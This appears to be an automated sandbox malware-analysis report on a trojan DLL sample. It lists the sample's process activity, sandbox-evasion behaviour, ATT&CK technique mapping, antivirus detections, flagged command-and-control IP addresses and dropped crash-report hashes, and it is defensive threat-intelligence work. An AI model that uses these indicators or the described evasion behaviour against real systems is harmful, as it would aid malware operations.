Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Tries to detect sandboxes / dynamic malware analysis system (file name check)

Show sources

Source: C:\Windows\System32\loaddll32.exe	Section loaded: \KnownDlls32\Testapp.EXE	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Section loaded: \KnownDlls32\Testapp.EXE	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Section loaded: \KnownDlls32\Testapp.EXE	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Section loaded: \KnownDlls32\Testapp.EXE	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Section loaded: \KnownDlls32\Testapp.EXE	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Section loaded: \KnownDlls32\Testapp.EXE	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Section loaded: \KnownDlls32\Testapp.EXE	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Section loaded: \KnownDlls32\Testapp.EXE	Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Thread delayed: delay time: 120000

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_10006D50 GetUserNameW,MessageBoxW,GetLastError,CreateFileA,DebugBreak,FlushFileBuffers,FreeEnvironmentStringsA,GetConsoleOutputCP,GetEnvironmentStrings,GetLocaleInfoA,GetStartupInfoA,GetStringTypeA,HeapValidate,IsBadReadPtr,LCMapStringA,LoadLibraryA,OutputDebugStringA,

4_2_10006D50

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\fc0bc077_by_Libranalysis.dll',#1

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: GetUserNameW,MessageBoxW,GetLastError,CreateFileA,DebugBreak,FlushFileBuffers,FreeEnvironmentStringsA,GetConsoleOutputCP,GetEnvironmentStrings,GetLocaleInfoA,GetStartupInfoA,GetStringTypeA,HeapValidate,IsBadReadPtr,LCMapStringA,LoadLibraryA,OutputDebugStringA,

4_2_10006D50

Source: C:\Windows\SysWOW64\rundll32.exe

4_2_10006D50

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	Path Interception	Process Injection11	Virtualization/Sandbox Evasion11	Input Capture1	Security Software Discovery11	Remote Services	Input Capture1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Process Injection11	LSASS Memory	Virtualization/Sandbox Evasion11	Remote Desktop Protocol	Archive Collected Data1	Exfiltration Over Bluetooth	Application Layer Protocol1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information2	Security Account Manager	Account Discovery1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Steganography	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Rundll321	NTDS	System Owner/User Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing3	LSA Secrets	Remote System Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	System Information Discovery11	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
fc0bc077_by_Libranalysis.dll	21%	Metadefender		Browse
fc0bc077_by_Libranalysis.dll	30%	ReversingLabs	Win32.Trojan.Wacatac
fc0bc077_by_Libranalysis.dll	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
4.2.rundll32.exe.26c0607.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
0.2.loaddll32.exe.1370000.0.unpack	100%	Avira	TR/ATRAPS.Gen2	Download File
16.2.rundll32.exe.2920607.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
19.2.rundll32.exe.2cd0000.2.unpack	100%	Avira	TR/ATRAPS.Gen2	Download File
18.2.rundll32.exe.2830000.2.unpack	100%	Avira	TR/ATRAPS.Gen2	Download File
17.2.rundll32.exe.3200607.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
3.2.rundll32.exe.2d30607.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
16.2.rundll32.exe.2940000.2.unpack	100%	Avira	TR/ATRAPS.Gen2	Download File
17.2.rundll32.exe.3220000.2.unpack	100%	Avira	TR/ATRAPS.Gen2	Download File
4.2.rundll32.exe.26e0000.2.unpack	100%	Avira	TR/ATRAPS.Gen2	Download File
0.2.loaddll32.exe.16b0607.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
20.2.rundll32.exe.2bc0607.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
18.2.rundll32.exe.2810607.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
20.2.rundll32.exe.2be0000.2.unpack	100%	Avira	TR/ATRAPS.Gen2	Download File
3.2.rundll32.exe.2d50000.2.unpack	100%	Avira	TR/ATRAPS.Gen2	Download File
19.2.rundll32.exe.29e0607.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

No contacted domains info

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
167.114.113.13	unknown	Canada	16276	OVHFR	true
95.138.161.226	unknown	United Kingdom	15395	RACKSPACE-LONGB	true
193.200.130.181	unknown	unknown	42960	CLOUD-MANAGEMENT-LLCUS	true

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	32.0.0 Black Diamond
Analysis ID:	404283
Start date:	04.05.2021
Start time:	21:42:23
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 8m 37s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	fc0bc077_by_Libranalysis.dll
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name:	Run with higher sleep bypass
Number of analysed new started processes analysed:	40
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal76.troj.evad.winDLL@23/24@0/4
EGA Information:	Failed
HDC Information:	Successful, ratio: 99.2% (good quality ratio 92.6%) Quality average: 75.3% Quality standard deviation: 30.5%
HCA Information:	Successful, ratio: 65% Number of executed functions: 9 Number of non-executed functions: 7
Cookbook Comments:	Adjust boot time Enable AMSI Sleeps bigger than 120000ms are automatically reduced to 1000ms Found application associated with file extension: .dll
Warnings:	Show All Excluded IPs from analysis (whitelisted): 13.64.90.137, 184.87.213.153, 104.43.193.48, 23.57.80.111, 2.20.142.209, 2.20.142.210, 40.126.31.4, 40.126.31.1, 20.190.159.136, 20.190.159.134, 40.126.31.8, 40.126.31.143, 40.126.31.135, 40.126.31.6, 40.88.32.150, 52.255.188.83, 20.82.209.104, 92.122.213.247, 92.122.213.194, 20.82.210.154 Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, www.tm.lg.prod.aadmsa.akadns.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e12564.dspb.akamaiedge.net, skypedataprdcoleus15.cloudapp.net, login.live.com, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, skypedataprdcolwus17.cloudapp.net, fs.microsoft.com, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, www.tm.a.prd.aadg.akadns.net, login.msa.msidentity.com, skypedataprdcolcus15.cloudapp.net, skypedataprdcoleus17.cloudapp.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net Report size exceeded maximum capacity and may have missing behavior information.

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
167.114.113.13	577e66d4_by_Libranalysis.dll	Get hash	malicious	Browse
	b8fe43e6_by_Libranalysis.dll	Get hash	malicious	Browse
	f845ef61_by_Libranalysis.dll	Get hash	malicious	Browse
	3c271eae_by_Libranalysis.dll	Get hash	malicious	Browse
	fc0bc077_by_Libranalysis.dll	Get hash	malicious	Browse
	e1c88b94_by_Libranalysis.dll	Get hash	malicious	Browse
	8743016c_by_Libranalysis.dll	Get hash	malicious	Browse
	d8417415_by_Libranalysis.dll	Get hash	malicious	Browse
	9a46403f_by_Libranalysis.dll	Get hash	malicious	Browse
	edae86a8_by_Libranalysis.dll	Get hash	malicious	Browse
	457aedfd_by_Libranalysis.dll	Get hash	malicious	Browse
	64b8ed95_by_Libranalysis.dll	Get hash	malicious	Browse
	8743016c_by_Libranalysis.dll	Get hash	malicious	Browse
	d8417415_by_Libranalysis.dll	Get hash	malicious	Browse
	c977c96e_by_Libranalysis.dll	Get hash	malicious	Browse
	9a46403f_by_Libranalysis.dll	Get hash	malicious	Browse
	457aedfd_by_Libranalysis.dll	Get hash	malicious	Browse
	edae86a8_by_Libranalysis.dll	Get hash	malicious	Browse
	b8dd7ed8_by_Libranalysis.dll	Get hash	malicious	Browse
	af1e75cf_by_Libranalysis.dll	Get hash	malicious	Browse
95.138.161.226	577e66d4_by_Libranalysis.dll	Get hash	malicious	Browse
	b8fe43e6_by_Libranalysis.dll	Get hash	malicious	Browse
	f845ef61_by_Libranalysis.dll	Get hash	malicious	Browse
	3c271eae_by_Libranalysis.dll	Get hash	malicious	Browse
	fc0bc077_by_Libranalysis.dll	Get hash	malicious	Browse
	e1c88b94_by_Libranalysis.dll	Get hash	malicious	Browse
	8743016c_by_Libranalysis.dll	Get hash	malicious	Browse
	d8417415_by_Libranalysis.dll	Get hash	malicious	Browse
	9a46403f_by_Libranalysis.dll	Get hash	malicious	Browse
	edae86a8_by_Libranalysis.dll	Get hash	malicious	Browse
	457aedfd_by_Libranalysis.dll	Get hash	malicious	Browse
	64b8ed95_by_Libranalysis.dll	Get hash	malicious	Browse
	8743016c_by_Libranalysis.dll	Get hash	malicious	Browse
	d8417415_by_Libranalysis.dll	Get hash	malicious	Browse
	c977c96e_by_Libranalysis.dll	Get hash	malicious	Browse
	9a46403f_by_Libranalysis.dll	Get hash	malicious	Browse
	457aedfd_by_Libranalysis.dll	Get hash	malicious	Browse
	edae86a8_by_Libranalysis.dll	Get hash	malicious	Browse
	b8dd7ed8_by_Libranalysis.dll	Get hash	malicious	Browse
	af1e75cf_by_Libranalysis.dll	Get hash	malicious	Browse

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
RACKSPACE-LONGB	577e66d4_by_Libranalysis.dll	Get hash	malicious	Browse	95.138.161.226
	b8fe43e6_by_Libranalysis.dll	Get hash	malicious	Browse	95.138.161.226
	f845ef61_by_Libranalysis.dll	Get hash	malicious	Browse	95.138.161.226
	3c271eae_by_Libranalysis.dll	Get hash	malicious	Browse	95.138.161.226
	fc0bc077_by_Libranalysis.dll	Get hash	malicious	Browse	95.138.161.226
	e1c88b94_by_Libranalysis.dll	Get hash	malicious	Browse	95.138.161.226
	8743016c_by_Libranalysis.dll	Get hash	malicious	Browse	95.138.161.226
	d8417415_by_Libranalysis.dll	Get hash	malicious	Browse	95.138.161.226
	9a46403f_by_Libranalysis.dll	Get hash	malicious	Browse	95.138.161.226
	edae86a8_by_Libranalysis.dll	Get hash	malicious	Browse	95.138.161.226
	457aedfd_by_Libranalysis.dll	Get hash	malicious	Browse	95.138.161.226
	64b8ed95_by_Libranalysis.dll	Get hash	malicious	Browse	95.138.161.226
	8743016c_by_Libranalysis.dll	Get hash	malicious	Browse	95.138.161.226
	d8417415_by_Libranalysis.dll	Get hash	malicious	Browse	95.138.161.226
	c977c96e_by_Libranalysis.dll	Get hash	malicious	Browse	95.138.161.226
	9a46403f_by_Libranalysis.dll	Get hash	malicious	Browse	95.138.161.226
	457aedfd_by_Libranalysis.dll	Get hash	malicious	Browse	95.138.161.226
	edae86a8_by_Libranalysis.dll	Get hash	malicious	Browse	95.138.161.226
	b8dd7ed8_by_Libranalysis.dll	Get hash	malicious	Browse	95.138.161.226
	af1e75cf_by_Libranalysis.dll	Get hash	malicious	Browse	95.138.161.226
OVHFR	577e66d4_by_Libranalysis.dll	Get hash	malicious	Browse	167.114.113.13
	b8fe43e6_by_Libranalysis.dll	Get hash	malicious	Browse	167.114.113.13
	f845ef61_by_Libranalysis.dll	Get hash	malicious	Browse	167.114.113.13
	3c271eae_by_Libranalysis.dll	Get hash	malicious	Browse	167.114.113.13
	fc0bc077_by_Libranalysis.dll	Get hash	malicious	Browse	167.114.113.13
	e1c88b94_by_Libranalysis.dll	Get hash	malicious	Browse	167.114.113.13
	8743016c_by_Libranalysis.dll	Get hash	malicious	Browse	167.114.113.13
	d8417415_by_Libranalysis.dll	Get hash	malicious	Browse	167.114.113.13
	9a46403f_by_Libranalysis.dll	Get hash	malicious	Browse	167.114.113.13
	edae86a8_by_Libranalysis.dll	Get hash	malicious	Browse	167.114.113.13
	457aedfd_by_Libranalysis.dll	Get hash	malicious	Browse	167.114.113.13
	64b8ed95_by_Libranalysis.dll	Get hash	malicious	Browse	167.114.113.13
	8743016c_by_Libranalysis.dll	Get hash	malicious	Browse	167.114.113.13
	d8417415_by_Libranalysis.dll	Get hash	malicious	Browse	167.114.113.13
	c977c96e_by_Libranalysis.dll	Get hash	malicious	Browse	167.114.113.13
	9a46403f_by_Libranalysis.dll	Get hash	malicious	Browse	167.114.113.13
	457aedfd_by_Libranalysis.dll	Get hash	malicious	Browse	167.114.113.13
	edae86a8_by_Libranalysis.dll	Get hash	malicious	Browse	167.114.113.13
	b8dd7ed8_by_Libranalysis.dll	Get hash	malicious	Browse	167.114.113.13
	af1e75cf_by_Libranalysis.dll	Get hash	malicious	Browse	167.114.113.13

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_rundll32.exe_1d91dafffd792f9b512ff42d10d3dd5f24a3f5de_82810a17_0766ec0c\Report.wer Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	12698
Entropy (8bit):	3.7729930672976533
Encrypted:	false
SSDEEP:	192:ieiM0oXORH4+V/Ojed+DgR/u7sBS274ItWcq:7iKXOh4+VGjed/u7sBX4ItWcq
MD5:	26D2C96778ACD61D9780C4EBC68E166F
SHA1:	26B7461B9FB449D28ECD6DDE7E99DE8AE63C5BBE
SHA-256:	C4CFF568547C8FEA55F6542B714C6FDBC188903C03D8EAB5B2A35C3103BD095A
SHA-512:	FA9C76A6E32A929A88F3B4DE1055A028A91617829A2F6F72E612A9BA8F857E8DE210406A9A6CB94A5AC04A20DB23BF7F7C257DDA1B5999489954E706A9963101
Malicious:	false
Yara Hits:	Rule: SUSP_WER_Critical_HeapCorruption, Description: Detects a crashed application that crashed due to a heap corruption error (could be a sign of exploitation), Source: C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_rundll32.exe_1d91dafffd792f9b512ff42d10d3dd5f24a3f5de_82810a17_0766ec0c\Report.wer, Author: Florian Roth
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.6.4.6.6.3.4.9.2.1.6.6.2.5.7.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.6.4.6.6.3.4.9.4.5.4.8.1.2.5.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.2.6.8.4.3.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.6.6.b.e.5.a.1.-.0.1.2.8.-.4.3.3.1.-.b.9.2.b.-.d.e.7.2.b.4.8.0.b.0.3.4.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.5.d.0.1.1.f.a.-.2.1.a.0.-.4.6.3.c.-.9.6.4.4.-.f.6.7.b.e.7.0.8.f.c.d.8.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.f.f.8.-.0.0.0.1.-.0.0.1.7.-.d.f.9.9.-.0.2.4.8.6.9.4.1.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.

C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_rundll32.exe_1d91dafffd792f9b512ff42d10d3dd5f24a3f5de_82810a17_10f0240f\Report.wer Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	12696
Entropy (8bit):	3.774323540979425
Encrypted:	false
SSDEEP:	192:3FiB0oXmRH4+V/Ojed+DgR/u7sQS274ItWc8:VivXmh4+VGjed/u7sQX4ItWc8
MD5:	0C20D6700D4FDF6471A54E7946F4CA18
SHA1:	D963D50A85003F2E41F000D70C816ADDEA69868A
SHA-256:	BD244616AF0012F8328FADB035BEDD3A0514480F6B8B391B3FA59F143DF325E0
SHA-512:	713D98A0AFD2F9DCF28BD48D1328D7477233CE305388615DF42AA8491DE750CE13AF5F8705941975A2CBE40D6D3D092571C45A03A71B2B4A31D6AEEB1262763E
Malicious:	false
Yara Hits:	Rule: SUSP_WER_Critical_HeapCorruption, Description: Detects a crashed application that crashed due to a heap corruption error (could be a sign of exploitation), Source: C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_rundll32.exe_1d91dafffd792f9b512ff42d10d3dd5f24a3f5de_82810a17_10f0240f\Report.wer, Author: Florian Roth
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.6.4.6.6.3.5.7.1.8.2.9.1.9.0.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.6.4.6.6.3.5.7.4.3.7.6.0.5.6.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.2.6.8.4.3.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.b.6.0.5.c.1.b.-.3.9.a.7.-.4.7.d.8.-.a.0.9.9.-.f.b.1.d.9.2.4.5.6.a.8.7.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.c.0.1.c.5.a.4.-.8.2.6.5.-.4.e.3.9.-.b.5.1.2.-.2.5.0.5.2.9.a.6.5.8.e.0.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.4.3.0.-.0.0.0.1.-.0.0.1.7.-.f.f.b.8.-.1.7.6.5.6.9.4.1.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.

C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_rundll32.exe_70ca6d92bb7cd6d05a398077544511f8e964d76_82810a17_0dc42354\Report.wer Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	12770
Entropy (8bit):	3.7728479326199715
Encrypted:	false
SSDEEP:	192:83Prim0oXTHBUZMX4jed+DgR/u7sQS274It7ch:OriAXTBUZMX4jed/u7sQX4It7ch
MD5:	AFC7551E811E97D4890917F0725F1135
SHA1:	ED63C72EE8C1309A591CCF3CDC5A5332F85E6611
SHA-256:	55ACE0B113C0EABD560D6E4668688CD71A30B75590AB9DBAD10CA315AC77A76C
SHA-512:	5392B7C52AF1C27897AA46975DFD75719BD67FDAFA1F38887C623F82E16ADF9D6521493C5A97F1C7FF55A2767F157B3C345DAD95844E42D89AEFDF1B7A5C5B1B
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.2.6.4.6.6.3.5.7.2.5.9.4.8.1.1.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.6.4.6.6.3.5.7.5.0.0.1.0.5.8.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.2.6.8.4.3.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.a.d.6.9.b.9.f.-.0.8.1.4.-.4.5.9.c.-.a.b.2.3.-.7.1.9.0.c.0.d.1.f.7.7.a.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.1.d.d.a.9.6.5.-.0.9.6.e.-.4.3.e.e.-.a.0.7.a.-.5.3.c.e.f.3.4.6.f.2.a.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.2.b.4.-.0.0.0.1.-.0.0.1.7.-.c.5.6.8.-.5.5.6.5.6.9.4.1.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.f.0.9.b.5.

C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_rundll32.exe_7dd67966396113c995f4a9c30eeff967a1ce3cd_82810a17_06802046\Report.wer Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	12682
Entropy (8bit):	3.769413043333247
Encrypted:	false
SSDEEP:	192:9SVi7K0oXN3xHBUZMX4jed+DoR/u7sQS274ItWcX:QViAXLBUZMX4jeF/u7sQX4ItWcX
MD5:	9440EA7972766E07CD1327E19C1C247B
SHA1:	088A04CA3B6C73A3D7650AB92F6597FFEE89EAF1
SHA-256:	6DEBE33DDFC65B62A5BD2DA29535905133645514D1E48AFC89ECF593E9604E10
SHA-512:	40EEF3E0A6B4115B94C490CA3F0A145F78DC65805BBADAF48B9DC31712F0682E1E8D116EE0908BEEBC3821917C74B67AECA3267F894AF96EA8AD4746380D91B6
Malicious:	false
